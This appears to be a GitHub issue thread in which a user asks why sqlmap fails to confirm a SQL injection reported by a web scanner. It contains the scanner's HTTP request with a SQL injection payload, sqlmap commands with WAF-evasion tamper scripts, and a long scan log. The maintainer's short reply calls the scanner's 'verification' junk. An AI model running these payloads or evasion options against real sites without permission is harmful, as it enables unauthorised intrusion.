Sqlmap doesn't exploit verified SQL injection

[fanatos123]

HTTP Request
GET /searchn.jsp?keywords=9%09or%091%3d(case%09%27a%27%09when%09%27a%27%09then%09(select%09count()%09from%09pg_aggregate%09a1%2c%09pg_aggregate%09a2%2c%09pg_aggregate%09a3%2c%09pg_aggregate%09a4)%09else%09%270%27%09end)&menu1=all&page=1 HTTP/1.1
Referer: http://site.com/search.jsp
Accept: /
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: site.com
Connection: Keep-Alive
X-WIPP: AscVersion=18.20.178.0
X-Scan-Memo: Category="Audit.Attack"; SID="E9494D638CB7EF3920B159BDC0F9E82B"; PSID="8A7F1208EF40F99D0A55A5AC3AA88D09"; SessionType="AuditAttack"; CrawlType="None"; AttackType="QueryParamManipulation"; OriginatingEngineID="9722923f-f8d3-49c2-90bd-7c0e15901c18"; AttackSequence="25"; AttackParamDesc="keywords"; AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="5657"; Engine="Sql+Injection"; SmartMode="NonServerSpecificOnly"; AttackString="9%2509or%25091%253d(case%2509%2527a%2527%2509when%2509%2527a%2527%2509then%2509(select%2509count()%2509from%2509pg_aggregate%2509a1%252c%2509pg_aggregate%2509a2%252c%2509pg_aggregate%2509a3%252c%2509pg_aggregate%2509a4)%2509else%2509%25270%2527%2509end)"; AttackStringProps="Attack"; ThreadId="191"; ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: RequestorThreadIndex="10"; sid="3207"; smi="0"; sc="1"; ID="abd38ee7-52b9-4086-b4cd-8e163764237f";
X-Request-Memo: ID="096f1939-5692-4c55-85ab-adffa316d74a"; sc="1"; ThreadId="191";
Cookie: CustomCookie=WebInspect123456ZX27DD4AC4F7404C55B362AC07A65D88B9Y6967;JSESSIONID=B976631512DDC9FADBC2C32AC68D3098

[fanatos123]

python sqlmap.py --url "http://site.com/searchn.jsp?keywords=9&menu1=all&page=1" -p "keywords" --random-agent --level 5 --risk 3 --tamper="space2comment.py" --no-cast --batch

[fanatos123]

c:\sqlmap>python sqlmap.py --url "http://site.com/searchn.jsp?keywords=9&menu1=all&page=1" -p "keywords" --random-agent --level 5 --tamper="nonrecursivereplacement.py,space2comment.py" --flush-session --batch
___
H
___ [(]__ ___ ___ {1.3.6.8#dev}
|_ -| . [.] | .'| . |
|| [.]|||__,| |
||V... || http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:58:14 /2019-06-03/

[17:58:14] [INFO] loading tamper module 'nonrecursivereplacement'
[17:58:14] [INFO] loading tamper module 'space2comment'
[17:58:14] [INFO] fetched random HTTP User-Agent header value 'Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.00' from file 'c:\sqlmap\data\txt\user-agents.txt'
[17:58:15] [INFO] flushing session file
[17:58:15] [INFO] testing connection to the target URL
[17:58:19] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:58:19] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/n] Y
[17:58:19] [INFO] testing if the target URL content is stable
[17:58:22] [INFO] target URL content is stable
[17:58:22] [WARNING] currently only couple of keywords are being processed ('UNION', 'SELECT', 'INSERT', 'UPDATE', 'FROM', 'WHERE'). You can set it manually according to your needs
[17:58:25] [WARNING] heuristic (basic) test shows that GET parameter 'keywords' might not be injectable
[17:58:29] [INFO] heuristic (XSS) test shows that GET parameter 'keywords' might be vulnerable to cross-site scripting (XSS) attacks
[17:58:29] [INFO] testing for SQL injection on GET parameter 'keywords'
[17:58:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:59:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[18:00:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[18:00:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:01:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[18:02:07] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[18:02:12] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:03:05] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[18:04:00] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[18:05:05] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (boolint)'
[18:06:02] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[18:07:08] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[18:07:22] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[18:08:16] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:08:16] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[18:08:18] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[18:08:18] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[18:08:21] [WARNING] reflective value(s) found and filtering out
[18:08:25] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[18:08:25] [INFO] testing 'MySQL boolean-based blind - Parameter replace (boolint)'
[18:08:32] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[18:08:32] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[18:08:34] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace (original value)'
[18:08:34] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)'
[18:08:35] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)'
[18:08:36] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[18:08:41] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[18:08:41] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[18:08:43] [INFO] testing 'Oracle boolean-based blind - Parameter replace (original value)'
[18:08:43] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[18:08:50] [INFO] testing 'Informix boolean-based blind - Parameter replace (original value)'
[18:08:51] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[18:08:52] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace (original value)'
[18:08:52] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[18:08:54] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[18:08:54] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[18:08:55] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[18:08:55] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[18:08:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[18:08:57] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[18:08:57] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[18:08:57] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[18:09:06] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY clause (original value)'
[18:09:06] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)'
[18:09:11] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[18:09:13] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)'
[18:09:13] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[18:09:15] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[18:09:15] [INFO] testing 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause'
[18:09:25] [INFO] testing 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[18:09:25] [INFO] testing 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause'
[18:09:26] [INFO] testing 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[18:09:26] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[18:10:18] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[18:10:18] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[18:10:49] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[18:11:30] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[18:11:30] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[18:11:59] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)'
[18:12:41] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[18:13:18] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries'
[18:13:50] [INFO] testing 'Oracle boolean-based blind - Stacked queries'
[18:14:22] [INFO] testing 'Microsoft Access boolean-based blind - Stacked queries'
[18:14:53] [INFO] testing 'SAP MaxDB boolean-based blind - Stacked queries'
[18:15:26] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:16:06] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:16:43] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:17:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:18:00] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:18:35] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:19:06] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:19:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:20:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[18:20:31] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[18:20:41] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[18:21:10] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[18:21:23] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[18:21:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[18:22:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[18:23:15] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:24:12] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[18:24:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[18:25:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[18:25:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[18:26:36] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[18:27:18] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:27:49] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[18:27:49] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[18:27:51] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[18:27:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[18:27:52] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[18:27:53] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[18:27:53] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[18:27:54] [INFO] testing 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[18:27:55] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[18:27:55] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[18:27:56] [INFO] testing 'Oracle error-based - Parameter replace'
[18:27:57] [INFO] testing 'Firebird error-based - Parameter replace'
[18:27:58] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[18:28:00] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[18:28:01] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[18:28:08] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[18:28:10] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[18:28:11] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[18:28:13] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[18:28:13] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[18:28:14] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)'
[18:28:15] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[18:28:17] [INFO] testing 'Oracle error-based - ORDER BY, GROUP BY clause'
[18:28:17] [INFO] testing 'Firebird error-based - ORDER BY clause'
[18:28:18] [INFO] testing 'MySQL inline queries'
[18:28:18] [INFO] testing 'PostgreSQL inline queries'
[18:28:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:28:19] [INFO] testing 'Oracle inline queries'
[18:28:19] [INFO] testing 'SQLite inline queries'
[18:28:19] [INFO] testing 'Firebird inline queries'
[18:28:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[18:28:20] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[18:28:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:29:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[18:29:24] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[18:29:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:30:12] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[18:30:35] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[18:30:50] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[18:31:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:31:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[18:32:13] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:32:30] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)'
[18:32:56] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP - comment)'
[18:33:12] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
[18:33:48] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP - comment)'
[18:33:48] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)'
[18:33:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:34:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[18:35:23] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[18:35:23] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[18:35:36] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[18:35:39] [INFO] GET parameter 'keywords' appears to be 'MySQL >= 5.0.12 AND time-based blind (SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided risk (1) value? [Y/n] Y
[18:35:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:35:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:36:09] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[18:36:48] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[18:36:51] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[18:37:09] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[18:37:24] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[18:37:37] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[18:37:56] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[18:38:08] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[18:38:20] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[18:38:32] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[18:38:43] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[18:38:55] [INFO] checking if the injection point on GET parameter 'keywords' is a false positive
[18:38:55] [WARNING] false positive or unexploitable injection point detected
[18:38:55] [WARNING] GET parameter 'keywords' does not seem to be injectable
[18:38:55] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests

[fanatos123]

verified >>>

[fanatos123]

sqlmap should detect injections but to no avail! what is the problem?

[fanatos123]

(e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2') , level'/'--risk' options changing the results does not bring

[stamparm]

That's call junk you have as "verification". Please use that tool in your further runs as sqlmap won't be able to match it: